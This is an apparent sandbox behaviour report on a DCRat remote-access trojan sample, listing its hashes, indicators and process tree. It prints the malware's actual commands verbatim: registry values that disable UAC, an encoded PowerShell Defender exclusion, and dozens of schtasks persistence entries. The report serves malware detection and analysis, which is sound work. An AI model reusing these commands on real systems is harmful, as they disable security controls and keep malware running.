dcrat | b031e7786adbf73be86bcf7c89adac3cb4ff7034ec748872fd242c35d08a3468

Analysis

max time kernel
29s
max time network
132s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
06/03/2023, 04:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

85397fd676a86cbf030d3abc21b602dd.exe
Size

1.7MB
MD5

85397fd676a86cbf030d3abc21b602dd
SHA1

6394b58e88a587eb164797a543c14922a0803768
SHA256

b031e7786adbf73be86bcf7c89adac3cb4ff7034ec748872fd242c35d08a3468
SHA512

9baee9d49aecb77ef7568562d2d802988e1382f783fda5d3f0a07d01f12e3722bcd548621e8ab9234a05f2e2767512d122db3da3e51fd15f7e10aac0ec01f6cc
SSDEEP

49152:SMKDsLRSSjyA9mg8QMBahc/L2Ud4A/g+c:KMRS+95MBaGL2U2AA

Score

10^/10

dcrat evasion infostealer rat spyware stealer trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 57 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4680	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3448	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3312	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1304	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	788	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3256	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3216	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3952	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3408	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4116	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4372	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3796	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2948	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4464	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4876	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	904	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	536	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4204	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1712	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1260	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2304	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3620	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3632	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4100	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3052	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4956	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2596	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4236	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4984	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4720	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2244	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1676	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1320	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2480	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2620	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4456	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3644	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4828	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3084	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1672	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4504	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	112	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	820	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2592	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2396	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4004	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1312	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2008	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2792	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4196	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1120	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4756	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3752	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1376	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	532	3876	schtasks.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	620	3876	schtasks.exe	52

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	websaves.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	websaves.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	websaves.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	backgroundTaskHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	backgroundTaskHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	backgroundTaskHost.exe

DCRat payload 6 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x000400000001f748-138.dat	dcrat
behavioral2/files/0x000400000001f748-143.dat	dcrat
behavioral2/files/0x000400000001f748-144.dat	dcrat
behavioral2/memory/4524-153-0x0000000000100000-0x000000000020A000-memory.dmp	dcrat
behavioral2/files/0x0006000000023188-278.dat	dcrat
behavioral2/files/0x0006000000023188-279.dat	dcrat

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	websaves.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	backgroundTaskHost.exe

Executes dropped EXE 4 IoCs

pid	Process
4524	websaves.exe
1848	VsDlx_reg.exe
2932	COM.exe
536	backgroundTaskHost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	websaves.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	websaves.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	backgroundTaskHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	backgroundTaskHost.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	freegeoip.app
9	freegeoip.app

Drops file in Program Files directory 27 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe	websaves.exe
File created	C:\Program Files (x86)\Windows Media Player\de-DE\eddb19405b7ce1	websaves.exe
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\fontdrvhost.exe	websaves.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\5b884080fd4f94	websaves.exe
File opened for modification	C:\Program Files (x86)\MSBuild\csrss.exe	websaves.exe
File created	C:\Program Files (x86)\MSBuild\886983d96e3d3e	websaves.exe
File created	C:\Program Files (x86)\Windows Portable Devices\9e8d7a4ca61bd9	websaves.exe
File created	C:\Program Files\Uninstall Information\COM.exe	websaves.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\fontdrvhost.exe	websaves.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\upfc.exe	websaves.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\dllhost.exe	websaves.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\images\SppExtComObj.exe	websaves.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\upfc.exe	websaves.exe
File opened for modification	C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe	websaves.exe
File opened for modification	C:\Program Files\Uninstall Information\COM.exe	websaves.exe
File created	C:\Program Files (x86)\Internet Explorer\images\SppExtComObj.exe	websaves.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\5940a34987c991	websaves.exe
File created	C:\Program Files (x86)\Windows Media Player\de-DE\backgroundTaskHost.exe	websaves.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\backgroundTaskHost.exe	websaves.exe
File created	C:\Program Files (x86)\Internet Explorer\images\e1ef82546f0b02	websaves.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ea1d8f6d871115	websaves.exe
File created	C:\Program Files\Uninstall Information\2072f1b0081f4c	websaves.exe
File created	C:\Program Files\Common Files\microsoft shared\eddb19405b7ce1	websaves.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\de-DE\backgroundTaskHost.exe	websaves.exe
File created	C:\Program Files (x86)\MSBuild\csrss.exe	websaves.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\dllhost.exe	websaves.exe
File created	C:\Program Files\Common Files\microsoft shared\backgroundTaskHost.exe	websaves.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\DigitalLocker\en-US\csrss.exe	websaves.exe
File created	C:\Windows\websaves.exe	schtasks.exe
File created	C:\Windows\COM.exe	schtasks.exe
File created	C:\Windows\DigitalLocker\en-US\csrss.exe	websaves.exe
File created	C:\Windows\DigitalLocker\en-US\886983d96e3d3e	websaves.exe
File opened for modification	C:\Windows\websaves.exe	websaves.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1820	2932	WerFault.exe	89

Creates scheduled task(s) 1 TTPs 57 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3256	schtasks.exe
4100	schtasks.exe
4456	schtasks.exe
3084	schtasks.exe
1312	schtasks.exe
4720	schtasks.exe
1320	schtasks.exe
2620	schtasks.exe
2008	schtasks.exe
4196	schtasks.exe
1376	schtasks.exe
788	schtasks.exe
904	schtasks.exe
536	schtasks.exe
8	schtasks.exe
2792	schtasks.exe
4116	schtasks.exe
2948	schtasks.exe
4876	schtasks.exe
620	schtasks.exe
1260	schtasks.exe
4236	schtasks.exe
2244	schtasks.exe
4004	schtasks.exe
4464	schtasks.exe
3620	schtasks.exe
3216	schtasks.exe
3952	schtasks.exe
3644	schtasks.exe
4828	schtasks.exe
4680	schtasks.exe
3796	schtasks.exe
3632	schtasks.exe
532	schtasks.exe
3448	schtasks.exe
1676	schtasks.exe
4504	schtasks.exe
3408	schtasks.exe
1712	schtasks.exe
2304	schtasks.exe
1672	schtasks.exe
4372	schtasks.exe
820	schtasks.exe
2396	schtasks.exe
1120	schtasks.exe
3312	schtasks.exe
1304	schtasks.exe
4204	schtasks.exe
4956	schtasks.exe
4984	schtasks.exe
3752	schtasks.exe
112	schtasks.exe
3052	schtasks.exe
2596	schtasks.exe
2480	schtasks.exe
2592	schtasks.exe
4756	schtasks.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings	backgroundTaskHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings	websaves.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
1800	powershell.exe
2932	COM.exe
2932	COM.exe
2932	COM.exe
1800	powershell.exe
4524	websaves.exe
4524	websaves.exe
4524	websaves.exe
4524	websaves.exe
4524	websaves.exe
4524	websaves.exe
4524	websaves.exe
536	backgroundTaskHost.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2008	85397fd676a86cbf030d3abc21b602dd.exe
Token: SeDebugPrivilege	1848	VsDlx_reg.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	2932	COM.exe
Token: SeDebugPrivilege	4524	websaves.exe
Token: SeDebugPrivilege	536	backgroundTaskHost.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2008 wrote to memory of 1800	2008	schtasks.exe	85
PID 2008 wrote to memory of 1800	2008	schtasks.exe	85
PID 2008 wrote to memory of 4524	2008	schtasks.exe	87
PID 2008 wrote to memory of 4524	2008	schtasks.exe	87
PID 2008 wrote to memory of 1848	2008	schtasks.exe	88
PID 2008 wrote to memory of 1848	2008	schtasks.exe	88
PID 2008 wrote to memory of 2932	2008	schtasks.exe	89
PID 2008 wrote to memory of 2932	2008	schtasks.exe	89
PID 4524 wrote to memory of 3948	4524	websaves.exe	152
PID 4524 wrote to memory of 3948	4524	websaves.exe	152
PID 3948 wrote to memory of 2208	3948	cmd.exe	154
PID 3948 wrote to memory of 2208	3948	cmd.exe	154
PID 3948 wrote to memory of 536	3948	cmd.exe	156
PID 3948 wrote to memory of 536	3948	cmd.exe	156
PID 536 wrote to memory of 2144	536	backgroundTaskHost.exe	157
PID 536 wrote to memory of 2144	536	backgroundTaskHost.exe	157
PID 536 wrote to memory of 2004	536	backgroundTaskHost.exe	158
PID 536 wrote to memory of 2004	536	backgroundTaskHost.exe	158

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	websaves.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	websaves.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	websaves.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	backgroundTaskHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	backgroundTaskHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	backgroundTaskHost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\85397fd676a86cbf030d3abc21b602dd.exe
"C:\Users\Admin\AppData\Local\Temp\85397fd676a86cbf030d3abc21b602dd.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAeQBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcABuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaAB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AYgB0ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
- C:\Windows\websaves.exe
  "C:\Windows\websaves.exe"
  2⤵
  - UAC bypass
  - Checks computer location settings
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:4524
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\a8TbDE3pUR.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3948
  - - C:\Windows\system32\w32tm.exe
      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
      4⤵
      PID:2208
  - - C:\odt\backgroundTaskHost.exe
      "C:\odt\backgroundTaskHost.exe"
      4⤵
      UAC bypass
      Checks computer location settings
      Executes dropped EXE
      Checks whether UAC is enabled
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:536
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ba95368b-d68c-4581-a606-76d03788f8b5.vbs"
        5⤵
        
        PID:2144
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0cdc54dc-49ba-46a4-b48e-2692de9e971e.vbs"
        5⤵
        
        PID:2004
- C:\Users\Admin\AppData\Local\Temp\VsDlx_reg.exe
  "C:\Users\Admin\AppData\Local\Temp\VsDlx_reg.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1848
- C:\Windows\COM.exe
  "C:\Windows\COM.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2932
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2932 -s 69536
    3⤵
    - Program crash
    PID:1820

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 184 -p 2932 -ip 2932
1⤵
PID:1556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Windows\DigitalLocker\en-US\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\en-US\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Windows\DigitalLocker\en-US\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Internet Explorer\images\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\images\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Internet Explorer\images\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\MSBuild\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\upfc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\Default User\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 5 /tr "'C:\odt\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\odt\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 5 /tr "'C:\odt\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2244

